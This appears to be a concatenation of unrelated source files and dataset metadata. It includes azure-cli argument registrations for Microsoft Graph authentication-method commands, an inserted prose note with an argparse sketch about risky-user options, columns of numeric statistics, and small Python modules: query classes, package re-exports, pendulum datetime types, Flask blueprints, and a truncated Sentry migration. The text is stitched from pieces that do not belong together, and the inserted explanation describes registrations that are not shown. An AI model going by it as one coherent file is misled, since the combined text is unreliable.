c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication update-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='')
c.argument('last_action_date_time', help='')
c.argument('resource_location', type=str, help='')
c.argument('status', arg_type=get_enum_type(['notstarted', 'running', 'succeeded', 'failed']), help='')
c.argument('status_detail', type=str, help='')
with self.argument_context('identitysignins user-authentication update-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('creation_date_time', help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins user-authentication update-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('phone_number', type=str, help='')
c.argument('phone_type', arg_type=get_enum_type(['mobile', 'alternateMobile', 'office', 'unknownFutureValue']),
help='')
c.argument('sms_sign_in_state', arg_type=get_enum_type(['notSupported', 'notAllowedByPolicy', 'notEnabled',
'phoneNumberNotUnique', 'ready', 'notConfigured',
'unknownFutureValue']), help='')
with self.argument_context('identitysignins user-authentication update-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication update-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
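Taken together, the registrations above define how the CLI surfaces each Microsoft Graph property. The sketch below approximates the semantics of get_enum_type and get_three_state_flag using plain argparse; it is an illustration, not the azure-cli implementation, and the sample ID value is hypothetical.

import argparse

# Approximation only: get_enum_type restricts input to the listed Graph enum
# values, and get_three_state_flag accepts an explicit true/false.
parser = argparse.ArgumentParser(prog='identitysignins risky-user-risky-user update-risky-user')
parser.add_argument('--risky-user-id', help='key: id of riskyUser')
parser.add_argument('--risk-state', choices=['none', 'confirmedSafe', 'remediated', 'dismissed',
                                             'atRisk', 'confirmedCompromised', 'unknownFutureValue'])
parser.add_argument('--is-deleted', choices=['true', 'false'])  # tri-state: unset means "leave unchanged"

args = parser.parse_args(['--risky-user-id', 'example-user-id', '--risk-state', 'dismissed'])
print(args.risk_state)  # dismissed; an out-of-enum value is rejected at parse time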
| 75.656306
| 137
| 0.654885
| 19,717
| 170,378
| 5.527464
| 0.039712
| 0.101243
| 0.055714
| 0.03984
| 0.963289
| 0.958912
| 0.953617
| 0.943901
| 0.93656
| 0.924971
| 0
| 0.003926
| 0.212187
| 170,378
| 2,251
| 138
| 75.689916
| 0.808025
| 0.003146
| 0
| 0.776989
| 0
| 0.019767
| 0.470026
| 0.13454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000507
| false
| 0.033958
| 0.001521
| 0
| 0.002027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10720fa3acad439ed181b3a2ce2f9084c8a83584
| 358
|
py
|
Python
|
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | null | null | null |
from .fractal import Fractal, FractalLabel, FractalLabelSR
from .fractal import FractalTUNITContrastive
from .fractal import make_fractal_alae_dataloader
from .fractal import make_fractal_clr_dataloader
from .fractal import make_fractal_clr_sr_dataloader
from .fractal import make_fractal_TUNIT_dataloader
from .celeba import CelebA, make_celeba_dataloader
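A package __init__ like this exists purely to flatten the import surface: with the re-exports above, consumers import from the package root instead of reaching into submodules.

# Equivalent thanks to the re-exports above; the first form hides the submodule layout.
from datasets import Fractal, make_fractal_alae_dataloader
# from datasets.fractal import Fractal, make_fractal_alae_dataloader  # what it aliases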
| 39.777778
| 58
| 0.882682
| 46
| 358
| 6.543478
| 0.282609
| 0.219269
| 0.33887
| 0.27907
| 0.491694
| 0.398671
| 0.272425
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 358
| 8
| 59
| 44.75
| 0.923313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1075bb0449cf1a6c46737d4a477c5136cda10e14
| 41
|
py
|
Python
|
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
omw/blueprints/ili/__init__.py
|
tnaskret/OMW
|
93bc5df8b163a523dc09e6d8138df8807b1b2c02
|
[
"MIT"
] | null | null | null |
from omw.blueprints.ili.views import ili
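This one-line module re-exports the ili Flask blueprint so it can be registered from the package path. A hypothetical registration is sketched below; the application factory shown is an assumption, not taken from the OMW codebase.

from flask import Flask
from omw.blueprints.ili import ili  # the blueprint re-exported above

app = Flask(__name__)       # hypothetical app; OMW's real factory may differ
app.register_blueprint(ili)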
| 20.5
| 40
| 0.829268
| 7
| 41
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 41
| 1
| 41
| 41
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
1098f2d5c6b733d2d311ebfa12b07ca277c6c872
| 8,231
|
py
|
Python
|
zbpy/basicqueries.py
|
zetabase/zbpy
|
80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
zbpy/basicqueries.py
|
zetabase/zbpy
|
80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
zbpy/basicqueries.py
|
zetabase/zbpy
|
80a7d6bc150486e67f8dff2ae65aaab135d69c2f
|
[
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
from . import zbprotocol_pb2
class QueryAnd():
def __init__(self, left, right):
"""
Initializes QueryAnd object.
Parameters:
left: SubQueryConvertible
right: SubQueryConvertible
"""
self.left = left #SubQueryConvertible
self.right = right #SubQueryConvertible
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
return zbprotocol_pb2.TableSubQuery(
isCompound=True,
compoundOperator=zbprotocol_pb2.QueryLogicalOperator.LOGICAL_AND,
compoundLeft=self.left.to_sub_query(),
compoundRight=self.right.to_sub_query(),
comparison=None
)
class QueryOr():
def __init__(self, left, right):
"""
Initializes QueryOr object.
Parameters:
left: SubQueryConvertible
right: SubQueryConvertible
"""
self.right = right #SubQueryConvertible
self.left = left #SubQueryConvertible
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
return zbprotocol_pb2.TableSubQuery(
isCompound=True,
compoundOperator=zbprotocol_pb2.QueryLogicalOperator.LOGICAL_OR,
compoundLeft=self.left.to_sub_query(),
compoundRight=self.right.to_sub_query(),
comparison=None
)
class QueryEquals():
def __init__(self, field, comp_value):
"""
Initializes QueryEquals object.
Parameters:
field: string
comp_value: any (sorta)
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.EQUALS,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryNotEqual():
def __init__(self, field, comp_value):
"""
        Initializes QueryNotEqual object.
Parameters:
field: string
comp_value: any (sorta)
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.NOT_EQUALS,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryGreaterThan():
def __init__(self, field, comp_value):
"""
Initializes QueryGreaterThan object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
        Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.GREATER_THAN,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryGreaterThanEqual():
def __init__(self, field, comp_value):
"""
Initializes QueryGreaterThanEqual object.
Parameters:
field: string
value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns a TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.GREATER_THAN_EQ,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryLessThan():
def __init__(self, field, comp_value):
"""
        Initializes QueryLessThan object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns a TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.LESS_THAN,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryLessThanEqual():
def __init__(self, field, comp_value):
"""
Initializes QueryLessThanEqual object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.LESS_THAN_EQ,
field=field,
value=value_str,
ordering=q_order
)
)
class QueryTextSearch():
def __init__(self, field, comp_value):
"""
Initializes QueryTextSearch object.
Parameters:
field: string
comp_value: any
"""
self.field = field
self.comp_value = comp_value
def to_sub_query(self):
"""
Returns TableSubQuery object.
"""
value = self.comp_value
field = self.field
value_str, q_order = query_object_typify(value)
        q_order = zbprotocol_pb2.QueryOrdering.FULL_TEXT  # full-text search always overrides the inferred ordering
return zbprotocol_pb2.TableSubQuery(
isCompound=False,
compoundOperator=0,
compoundLeft=None,
compoundRight=None,
comparison=zbprotocol_pb2.TableSubqueryComparison(
op=zbprotocol_pb2.QueryOperator.TEXT_SEARCH,
field=field,
value=value_str,
ordering=q_order
)
)
def query_object_typify(value):
"""
Returns string, QueryOrdering.
Parameters:
value: any
"""
q_order = zbprotocol_pb2.QueryOrdering.LEXICOGRAPHIC
    if isinstance(value, (int, float)):
        q_order = zbprotocol_pb2.QueryOrdering.REAL_NUMBERS
    value_str = str(value)
return value_str, q_order
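Each class above converts itself into one node of a protobuf TableSubQuery tree, so compound filters are built by nesting. A minimal sketch follows; the field names 'age' and 'name' are hypothetical examples, not taken from the zbpy docs.

# (age >= 21) AND (name == "alice"), expressed as a TableSubQuery tree.
query = QueryAnd(
    QueryGreaterThanEqual('age', 21),  # numeric value -> REAL_NUMBERS ordering
    QueryEquals('name', 'alice'),      # string value  -> LEXICOGRAPHIC ordering
)
sub_query = query.to_sub_query()       # zbprotocol_pb2.TableSubQuery message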
| 27.345515
| 77
| 0.563723
| 721
| 8,231
| 6.174757
| 0.104022
| 0.068733
| 0.040881
| 0.02628
| 0.88814
| 0.862309
| 0.834232
| 0.763702
| 0.755391
| 0.755391
| 0
| 0.006869
| 0.363261
| 8,231
| 301
| 78
| 27.345515
| 0.842587
| 0.152715
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109195
| false
| 0
| 0.005747
| 0
| 0.224138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52c78318354f76710484c56eb6d49370c354aa19
| 127
|
py
|
Python
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 4
|
2020-09-08T08:14:21.000Z
|
2022-01-27T19:22:53.000Z
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 19
|
2018-02-13T05:51:25.000Z
|
2022-03-27T22:48:11.000Z
|
jj/http/__init__.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 3
|
2017-11-17T13:25:23.000Z
|
2022-02-03T12:57:00.000Z
|
from .codes import * # noqa: F401, F403
from .headers import * # noqa: F401, F403
from .methods import * # noqa: F401, F403
| 31.75
| 42
| 0.669291
| 18
| 127
| 4.722222
| 0.444444
| 0.352941
| 0.494118
| 0.635294
| 0.517647
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18
| 0.212598
| 127
| 3
| 43
| 42.333333
| 0.67
| 0.393701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5e0978fca6216486da96347e01a64ff5c5caeabf
| 136
|
py
|
Python
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | 1
|
2021-06-27T10:50:37.000Z
|
2021-06-27T10:50:37.000Z
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | 5
|
2021-06-19T08:33:47.000Z
|
2021-06-19T08:59:30.000Z
|
canbeta/child/nodes/__init__.py
|
FROM-THE-EARTH/canbeta
|
d41cf1b3dd926c5144dc5086f42943a0594c478b
|
[
"MIT"
] | null | null | null |
from can09.child.nodes.child_server_node import ChildServerNode
from can09.child.nodes.mission_standby_node import MissionStandbyNode
| 27.2
| 69
| 0.882353
| 18
| 136
| 6.444444
| 0.611111
| 0.155172
| 0.241379
| 0.327586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.073529
| 136
| 4
| 70
| 34
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e17b8938bf770c704a3fe619f707e07ea52cf37
| 330
|
py
|
Python
|
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
rihbyne/yowsup
|
06581618fdba54aa51041624e19d5dce64b054ef
|
[
"MIT"
] | 1
|
2019-12-16T11:00:06.000Z
|
2019-12-16T11:00:06.000Z
|
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
pasinit/yowsup
|
894007650bf3d75ef7af4a0e57e84dc7cccc4dfe
|
[
"MIT"
] | null | null | null |
yowsup/layers/protocol_presence/protocolentities/__init__.py
|
pasinit/yowsup
|
894007650bf3d75ef7af4a0e57e84dc7cccc4dfe
|
[
"MIT"
] | 3
|
2017-08-18T21:24:46.000Z
|
2018-09-07T21:07:39.000Z
|
from .presence import PresenceProtocolEntity
from .presence_available import AvailablePresenceProtocolEntity
from .presence_unavailable import UnavailablePresenceProtocolEntity
from .presence_subscribe import SubscribePresenceProtocolEntity
from .presence_unsubscribe import UnsubscribePresenceProtocolEntity
| 55
| 68
| 0.860606
| 24
| 330
| 11.666667
| 0.5
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124242
| 330
| 5
| 69
| 66
| 0.968858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e1c928b579dafdbae96737c635490afae634714
| 258
|
py
|
Python
|
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UnusedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
<warning descr="Unused import statement">from my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
<warning descr="Unused import statement">from my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
| 86
| 128
| 0.782946
| 34
| 258
| 5.882353
| 0.352941
| 0.12
| 0.18
| 0.24
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.077519
| 258
| 2
| 129
| 129
| 0.840336
| 0
| 0
| 1
| 0
| 0
| 0.387597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
eaa825d3ea4d037afc3128bfcb68d181c862f970
| 1,391
|
py
|
Python
|
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
bloop/ext/pendulum.py
|
monoflo/bloop
|
c476298e5a40decf9fdf2ed50df74be8f91fdffd
|
[
"MIT"
] | null | null | null |
import pendulum

from .. import types

# https://github.com/sdispater/pendulum/issues/97
DEFAULT_TIMEZONE = "utc"


class DateTime(types.DateTime):
    python_type = pendulum.Pendulum

    def __init__(self, timezone=DEFAULT_TIMEZONE):
        self.timezone = timezone
        super().__init__()

    def dynamo_dump(self, value, *, context, **kwargs):
        if value is None:
            return None
        value = value.in_timezone("utc")
        return super().dynamo_dump(value, context=context, **kwargs)

    def dynamo_load(self, value, *, context, **kwargs):
        if value is None:
            return None
        dt = super().dynamo_load(value, context=context, **kwargs)
        return pendulum.instance(dt).in_timezone(self.timezone)


class Timestamp(types.Timestamp):
    python_type = pendulum.Pendulum

    def __init__(self, timezone=DEFAULT_TIMEZONE):
        self.timezone = timezone
        super().__init__()

    def dynamo_dump(self, value, *, context, **kwargs):
        if value is None:
            return None
        value = value.in_timezone("utc")
        return super().dynamo_dump(value, context=context, **kwargs)

    def dynamo_load(self, value, *, context, **kwargs):
        if value is None:
            return None
        dt = super().dynamo_load(value, context=context, **kwargs)
        return pendulum.instance(dt).in_timezone(self.timezone)
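These types normalize values to UTC on write and localize on read, and are meant to plug into bloop's declarative models. A minimal usage sketch, assuming bloop's public BaseModel/Column/String API; the Order model itself is hypothetical:

from bloop import BaseModel, Column, String
from bloop.ext.pendulum import DateTime

class Order(BaseModel):  # hypothetical model
    id = Column(String, hash_key=True)
    created_on = Column(DateTime(timezone="Europe/Zurich"))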
| 28.979167 | 68 | 0.64486 | 163 | 1,391 | 5.300614 | 0.214724 | 0.111111 | 0.092593 | 0.101852 | 0.837963 | 0.837963 | 0.837963 | 0.837963 | 0.837963 | 0.837963 | 0 | 0.001889 | 0.238677 | 1,391 | 47 | 69 | 29.595745 | 0.813975 | 0.033789 | 0 | 0.848485 | 0 | 0 | 0.006706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.060606 | 0 | 0.606061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eaf0cf989c05432f3fcf643b0e316101ed78ed1d | 155 | py | Python |
app/blueprints/cms_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | ["MIT"] | null | null | null |
app/blueprints/cms_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | ["MIT"] | null | null | null |
app/blueprints/cms_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
bp_cms_main = Blueprint('bp_cms_main', __name__, static_folder='static')
from . import extensions
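For context, a blueprint like this is attached to an application with Flask's standard register_blueprint call; the app module and url_prefix below are assumptions for illustration:

from flask import Flask
from app.blueprints.cms_main import bp_cms_main

app = Flask(__name__)
app.register_blueprint(bp_cms_main, url_prefix='/cms')  # url_prefix is an assumption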
| 15.5 | 72 | 0.722581 | 21 | 155 | 4.904762 | 0.666667 | 0.213592 | 0.271845 | 0.349515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.148387 | 155 | 9 | 73 | 17.222222 | 0.772727 | 0.135484 | 0 | 0 | 0 | 0 | 0.128788 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
dc75ac6b6364ed14d4e0014dc3d7aca8febfc914 | 7,022 | py | Python |
src/sentry/migrations/0001_initial.py | rogerhu/sentry | ee2b190e92003abe0f538b2df5b686e425df1200 | ["BSD-3-Clause"] | 2 | 2015-10-14T12:45:32.000Z | 2016-01-27T03:24:43.000Z |
src/sentry/migrations/0001_initial.py | simmetria/sentry | 9731f26adb44847d1c883cca108afc0755cf21cc | ["BSD-3-Clause"] | null | null | null |
src/sentry/migrations/0001_initial.py | simmetria/sentry | 9731f26adb44847d1c883cca108afc0755cf21cc | ["BSD-3-Clause"] | null | null | null |
# encoding: utf-8
import datetime

from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

